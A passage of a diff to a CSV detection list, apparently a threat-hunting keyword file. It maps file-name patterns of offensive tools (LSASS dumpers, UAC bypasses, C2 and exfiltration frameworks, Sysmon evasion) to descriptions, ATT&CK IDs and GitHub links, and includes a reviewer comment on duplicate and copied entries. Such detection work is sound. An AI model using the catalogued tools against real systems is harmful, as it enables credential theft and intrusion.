 "*\samantha.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z"
-"*\save_reg.hive*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*\save_reg.hive*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
 "*\scanACLsResults.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*\scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
 "*\scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
 "*\SCMUACBypass\*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z"
@@ -6383,19 +6511,21 @@
 "*\ScriptSentry.psd1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
 "*\ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
 "*\ScriptSentry.txt*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
-"*\Seatbelt.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
-"*\Seatbelt\Commands\*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
-"*\ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
-"*\ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
-"*\ServerC2\ServerC2.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Seatbelt.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\Seatbelt\Commands\*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*\ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\ServerC2\ServerC2.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
 "*\servers\dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*\servers\icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
 "*\servers\smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
-"*\SessionSearcher.csproj*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
-"*\SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\SessionSearcher.csproj*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
 "*\shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*\shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\ShadowSpray\*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
-"*\Sharefinder.ps1*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\Sharefinder.ps1*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
 "*\SharpAzbelt.csproj*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
 "*\SharpAzbelt.exe*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
 "*\SharpAzbelt.sln*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
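Review bot: The added `*\shadowcoerce.py*` row repeats a keyword that the unchanged row directly above it already assigns to exegol, so the same pattern now maps to two tools; a consumer that keys on the keyword column will get a duplicate hit or an ambiguous attribution, and the pair should be merged or the overlap recorded in `metadata_comment`. The NetExec rows added here (`*\scuffy.py*`, plus `*\scan-network.py*`, `*\slinky.py*`, `*\spider_plus.py*` and `*\spooler.py*` in the neighbouring hunks) are bare script names with severity `10` and `metadata_comment` left at `N/A`; a comment such as `generic file name - risk of false positives` would tell a detection engineer to pair them with other context before alerting. All of these rows also carry the same technique, tactic and category values as the SharpDomainSpray row (`T1069 - T1021 - T1136 - T1018`, `Credential Access`), which looks copied rather than chosen per module and is worth confirming.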
@@ -6405,8 +6535,8 @@
 "*\SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
 "*\SharpExfiltrate\*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
 "*\SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
-"*\SharpHoundCommon\*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z"
-"*\SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*\SharpHoundCommon\*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*\SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
 "*\SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z"
 "*\SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z"
 "*\SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
@@ -6416,52 +6546,56 @@ "*\shellcode_samples\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\sherlock.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\Shhmon.*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*\SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*\SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*\SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*\SilentProcessExit.sln*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for 
CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*\SilentProcessExit.sln*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*\SillyRAT\*.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - 
Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*\SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 